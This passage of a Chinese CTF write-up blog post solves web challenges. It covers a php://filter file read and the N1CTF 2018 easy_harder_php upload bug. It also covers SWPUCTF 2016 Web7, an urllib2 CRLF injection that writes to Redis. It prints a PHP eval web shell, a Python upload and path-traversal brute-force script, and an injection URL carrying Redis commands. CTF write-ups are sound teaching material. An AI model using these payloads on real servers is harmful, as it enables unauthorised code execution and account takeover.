<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;woofers&#x2F;resource&#x3D;flag</span><br></pre></td></tr></table></figure>

<p>即可得到flag的base64值</p>
<h3 id="0x-06-N1CTF-2018-easy-harder-php"><a href="#0x-06-N1CTF-2018-easy-harder-php" class="headerlink" title="0x 06 [N1CTF 2018]easy_harder_php"></a>0x 06 [N1CTF 2018]easy_harder_php</h3><ul>
<li><p>考点</p>
<p>SSRF+文件名爆破</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<ol>
<li>SSRF登录参考[De1CTF 2019]ShellShellShell题解，这里记录后续getshell操作。在publish页面存在一个文件上传功能，审计代码发现只能上传图片，而且上传的文件不能有<code>&lt;?php</code>， 这儿可以用<code>&lt;script language=&#39;php&#39;&gt;</code>代替，文件上传之后是执行一个sh命令如下，我们可以文件包含看看sh文件的内容</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">if(move_uploaded_file($uploaded_file,$move_to_file)) &#123;</span><br><span class="line">            if(stripos(file_get_contents($move_to_file),&#39;&lt;?php&#39;)&gt;&#x3D;0)</span><br><span class="line">                system(&#39;sh &#x2F;home&#x2F;nu1lctf&#x2F;clean_danger.sh&#39;);</span><br><span class="line">            return $file_true_name;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>



<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200328124926898.png" alt></p>
<p>这儿就需要用到linux的一个小trick了，当我们的文件名是以<code>-</code>开头时这个命令会报错从而让文件保存下来。</p>
<ol start="2">
<li>所以我们的思路就是上传一个以<code>-</code>开头的图片码，然后再爆破出上传的文件名，构造shell如下：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language&#x3D;&quot;php&quot;&gt; </span><br><span class="line">$_POST[&quot;xxx&quot;]&#x3D;str_replace(&quot;[&quot;,&quot;&#39;&quot;,$_POST[&quot;xxx&quot;]);</span><br><span class="line">$_POST[&quot;xxx&quot;]&#x3D;str_replace(&quot;]&quot;,&quot;&#39;&quot;,$_POST[&quot;xxx&quot;]);</span><br><span class="line">echo $_POST[&quot;xxx&quot;];</span><br><span class="line">eval($_POST[&quot;xxx&quot;]);</span><br><span class="line">&lt;&#x2F;script&gt;</span><br><span class="line"># 由于题目过了了我们的输入所以，没办法使用引号和单引号，我们用&quot;[&quot;，和&quot;]&quot;代替</span><br></pre></td></tr></table></figure>

<p>爆破文件名脚本如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding:utf-8 -*-</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">time &#x3D; int(time.time())*100</span><br><span class="line"></span><br><span class="line">request_url &#x3D; &#39;http:&#x2F;&#x2F;8ebb02fd-d153-4801-a104-0da7ec58a462.node3.buuoj.cn&#x2F;index.php?action&#x3D;publish&#39;</span><br><span class="line"></span><br><span class="line">cookie &#x3D; &#39;&#39;&#39;PHPSESSID&#x3D;r8gq3bh41h899tuquthqmoefe3&#39;&#39;&#39;</span><br><span class="line">header &#x3D; &#123;</span><br><span class="line">&#39;Cookie&#39;: cookie&#125;</span><br><span class="line">request_file &#x3D; &#123;&#39;pic&#39;:(&#39;-xx.jpg&#39;,open(&#39;D:&#x2F;-xx.jpg&#39;),&#39;image&#x2F;jpeg&#39;)&#125;</span><br><span class="line">res &#x3D; requests.post(url&#x3D;request_url, headers&#x3D;header,files&#x3D;request_file)	# url,data,files</span><br><span class="line">print res.text</span><br><span class="line">print time</span><br><span class="line"></span><br><span class="line">url &#x3D; &#39;http:&#x2F;&#x2F;8ebb02fd-d153-4801-a104-0da7ec58a462.node3.buuoj.cn&#x2F;index.php?action&#x3D;..&#x2F;..&#x2F;..&#x2F;..&#x2F;app&#x2F;adminpic&#x2F;-xx&#123;&#125;.jpg&#39;</span><br><span class="line">for i in range(10000):</span><br><span class="line">    tmp &#x3D; time + i</span><br><span class="line">    ul &#x3D; url.format(tmp)</span><br><span class="line">    html &#x3D; requests.get(ul).status_code</span><br><span class="line">    print(html,i)</span><br><span class="line">    if html &#x3D;&#x3D; 200:</span><br><span class="line">        print(ul)</span><br><span class="line">        break</span><br></pre></td></tr></table></figure>

<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200330011355490.png" alt></p>
<p>参考链接：</p>
<blockquote>
<p><a href="https://blog.csdn.net/a3320315/article/details/104088080" target="_blank" rel="noopener">https://blog.csdn.net/a3320315/article/details/104088080</a></p>
</blockquote>
<h3 id="0x-07-SWPUCTF-2016-Web7"><a href="#0x-07-SWPUCTF-2016-Web7" class="headerlink" title="0x 07 [SWPUCTF 2016]Web7"></a>0x 07 [SWPUCTF 2016]Web7</h3><ul>
<li><p>考点</p>
<p>Python2 Urllib2头部注入(CVE-2016-5699)</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<ol>
<li>题目源代码：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">#!&#x2F;usr&#x2F;bin&#x2F;python </span><br><span class="line"># coding:utf8</span><br><span class="line">import cherrypy</span><br><span class="line">import urllib2</span><br><span class="line">import redis</span><br><span class="line"></span><br><span class="line">class web7:</span><br><span class="line"></span><br><span class="line">    def index(self):</span><br><span class="line">        return &quot;&lt;script&gt; window.location.href&#x3D;&#39;&#x2F;input&#39;;&lt;&#x2F;script&gt;&quot;</span><br><span class="line"></span><br><span class="line">    def input(self,url&#x3D;&quot;&quot;,submit&#x3D;&quot;&quot;):</span><br><span class="line">        file&#x3D;open(&quot;index.html&quot;,&quot;r&quot;).read()</span><br><span class="line">        reheaders&#x3D;&quot;&quot;</span><br><span class="line">        if cherrypy.request.method&#x3D;&#x3D;&quot;GET&quot;:</span><br><span class="line">            reheaders&#x3D;&quot;&quot;</span><br><span class="line">        else:</span><br><span class="line">            url&#x3D;cherrypy.request.params[&quot;url&quot;]</span><br><span class="line">            submit&#x3D;cherrypy.request.params[&quot;submit&quot;]</span><br><span class="line">            try:</span><br><span class="line">                for x in urllib2.urlopen(url).info().headers:</span><br><span class="line">                    reheaders&#x3D;reheaders+x+&quot;&lt;br&gt;&quot;</span><br><span class="line">            except Exception,e:</span><br><span class="line">                reheaders&#x3D;&quot;错误&quot;+str(e)</span><br><span class="line">            for x in urllib2.urlopen(url).info().headers:</span><br><span class="line">                reheaders&#x3D;reheaders+x+&quot;&lt;br&gt;&quot;</span><br><span class="line">        file&#x3D;file.replace(&quot;&lt;?response?&gt;&quot;,reheaders)</span><br><span class="line">        return file</span><br><span class="line"></span><br><span class="line">    def login(self,password&#x3D;&quot;&quot;,submit&#x3D;&quot;&quot;):</span><br><span class="line">        pool &#x3D; redis.ConnectionPool(host&#x3D;&#39;127.0.0.1&#39;, port&#x3D;6379)</span><br><span class="line">        r &#x3D; redis.Redis(connection_pool&#x3D;pool)</span><br><span class="line">        re&#x3D;&quot;&quot;</span><br><span class="line">        file&#x3D;open(&quot;login.html&quot;,&quot;r&quot;).read()</span><br><span class="line">        if cherrypy.request.method&#x3D;&#x3D;&quot;GET&quot;:</span><br><span class="line">            re&#x3D;&quot;&quot;</span><br><span class="line">        else:</span><br><span class="line">            password&#x3D;cherrypy.request.params[&quot;password&quot;]</span><br><span class="line">            submit&#x3D;cherrypy.request.params[&quot;submit&quot;]</span><br><span class="line">            if r.get(&quot;admin&quot;)&#x3D;&#x3D;password:</span><br><span class="line">                re&#x3D;open(&quot;flag&quot;,&#39;r&#39;).readline()</span><br><span class="line">            else:</span><br><span class="line">                re&#x3D;&quot;Can&#39;t find admin:&quot;+password+&quot;,fast fast fast.....&quot;</span><br><span class="line">        file&#x3D;file.replace(&quot;&lt;?response?&gt;&quot;,re)</span><br><span class="line">        return file</span><br><span class="line">cherrypy.config.update(&#123;&#39;server.socket_host&#39;: &#39;0.0.0.0&#39;,</span><br><span class="line">                        &#39;server.socket_port&#39;: 8080,</span><br><span class="line">                       &#125;)</span><br><span class="line">cherrypy.quickstart(web7(),&#39;&#x2F;&#39;)</span><br></pre></td></tr></table></figure>

<p>题目环境：Python 2.7.5+Redis 2.6</p>
<p>两个输入点，一个<code>/input</code>允许我们输入URL，然后会用urllib2.urlopen()访问我们的URL。还有一个<code>/login</code>，要求我们输入管理员的密码，如果与Redis数据库中的密码相同，我们就可以拿到Flag。</p>
<p>根据urllib2.urlopen()的历史漏洞：<a href="https://bugs.python.org/issue30458来打内网" target="_blank" rel="noopener">https://bugs.python.org/issue30458来打内网</a></p>
<p>简单来说，就是urlopen()处理URL的时候没有考虑换行符，导致我们可以在正常的HTTP头中插入任意内容</p>
<p>payload：<code>[http://127.0.0.1%0d%0aset%20admin%20admin%0d%0asave%0d%0a:6379/foo](http://127.0.0.1 set admin admin save :6379/foo)</code></p>
<p>提交之后迅速登入login得到flag</p>
<blockquote>
<p>参考资料：<a href="https://tiaonmmn.github.io/2019/09/12/SWPUCTF-2016-Web7/" target="_blank" rel="noopener">https://tiaonmmn.github.io/2019/09/12/SWPUCTF-2016-Web7/</a></p>
</blockquote>

  </div>
</article>

        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/tags/">Tag</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-01-GYCTF2020-Easyphp"><span class="toc-number">1.</span> <span class="toc-text">0x 01 [GYCTF2020]Easyphp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-02-De1CTF-2019-ShellShellShell"><span class="toc-number">2.</span> <span class="toc-text">0x 02 [De1CTF 2019]ShellShellShell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-03-SUCTF-2019-Upload-Labs-2"><span class="toc-number">3.</span> <span class="toc-text">0x 03 [SUCTF 2019]Upload Labs 2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-04-GWCTF-2019-mypassword"><span class="toc-number">4.</span> <span class="toc-text">0x 04 [GWCTF 2019]mypassword</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-05-BSidesCF-2020-Had-a-bad-day"><span class="toc-number">5.</span> <span class="toc-text">0x 05 [BSidesCF 2020]Had a bad day</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-06-N1CTF-2018-easy-harder-php"><span class="toc-number">6.</span> <span class="toc-text">0x 06 [N1CTF 2018]easy_harder_php</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-07-SWPUCTF-2016-Web7"><span class="toc-number">7.</span> <span class="toc-text">0x 07 [SWPUCTF 2016]Web7</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://yoursite.com/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/&title=BUUOJ-web刷题（三）" target="_blank" rel="noopener"><i class="fab fa-qq fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://service.weibo.com/share/share.php?url=http://yoursite.com/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/&title=BUUOJ-web刷题（三）" target="_blank" rel="noopener"><i class="fab fa-weibo fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/&text=BUUOJ-web刷题（三）" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=BUUOJ-web刷题（三）&body=Check out this article: http://yoursite.com/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2020 John Doe 
    <a href="http://www.beian.miit.gov.cn/" target="_blank">湘ICP备17005082号</a>
    
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/tags/">Tag</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </nav>
  </div>
  
  <div class="footer-custom">
    Framework by <a href="https://hexo.io" target="_blank">Hexo</a> & Theme by <a href="https://github.com/xuthus5/hexo-theme-cactus" target="_blank">Cactus-CN</a> & CDN provided by
     
      <a href="https://www.upyun.com/?utm_source=lianmeng&utm_medium=referral" target="_blank">
        <img class="img-response" src="/images/upyun.png" alt="cdn image">
      </a>
    
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css">


<link rel="stylesheet" href="https://cdn.staticfile.org/justifiedGallery/3.7.0/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js"></script>


<script src="https://cdn.staticfile.org/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight .code pre").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      target: function(trigger) {
        return trigger.nextElementSibling;
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

</body>
</html>
